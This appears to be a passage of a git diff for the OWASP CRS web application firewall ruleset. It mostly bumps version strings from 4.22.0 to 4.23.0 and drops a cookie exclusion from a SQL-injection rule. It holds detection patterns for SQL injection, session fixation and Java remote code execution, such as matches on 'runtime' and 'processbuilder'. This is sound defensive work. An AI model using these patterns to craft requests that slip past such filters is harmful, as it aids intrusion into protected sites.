@@ -1907,7 +1907,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'O # This is a stricter sibling of rule 942420. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ "id:942421,\ phase:1,\ block,\ @@ -1923,7 +1923,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx (( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1952,7 +1952,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index e74dbf5186..2fa8a5bfef 100644 --- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # 
@@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -44,7 +44,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\. tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -66,7 +66,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.943110_matched_var_name=%{matched_var_name}',\ chain" @@ -94,7 +94,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.943120_matched_var_name=%{matched_var_name}',\ chain" 
@@ -105,24 +105,24 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index d3e8a6779a..3820e4f83c 100644 --- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # 
@@ -13,8 +13,8 @@ # # Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file. -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -46,7 +46,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -78,7 +78,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS|XML:/*|XML://@* "@rx (?i)(?:unmarshaller|base64data|java\.)" \ @@ -103,7 +103,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ 
@@ -135,7 +135,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -174,7 +174,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -222,14 +222,14 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -260,7 +260,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -292,7 +292,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -313,7 +313,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -334,7 +334,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -358,7 +358,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -383,14 +383,14 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # 
@@ -417,14 +417,14 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/248',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # @@ -453,7 +453,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-JAVA',\ tag:'capec/1000/152/137/6',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf index 05b290b300..2023aee486 100644 --- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -24,7 +24,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ @@ -34,7 +34,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ @@ -44,7 +44,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ @@ -54,7 +54,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ @@ -64,7 +64,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ @@ -74,7 +74,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ 
@@ -84,7 +84,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ @@ -94,7 +94,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" # at start of phase 2, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores @@ -106,7 +106,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=0'" SecAction \ @@ -116,7 +116,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=0'" # Summing up the blocking and detection anomaly scores in phase 2 @@ -128,7 +128,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ @@ -138,7 +138,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ @@ -148,7 +148,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ 
@@ -158,7 +158,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ @@ -168,7 +168,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ @@ -178,7 +178,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ @@ -188,7 +188,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ @@ -198,7 +198,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" @@ -217,7 +217,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule TX:EARLY_BLOCKING "@eq 1" 
@@ -230,34 +230,34 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 1 (default) =- (apply only when 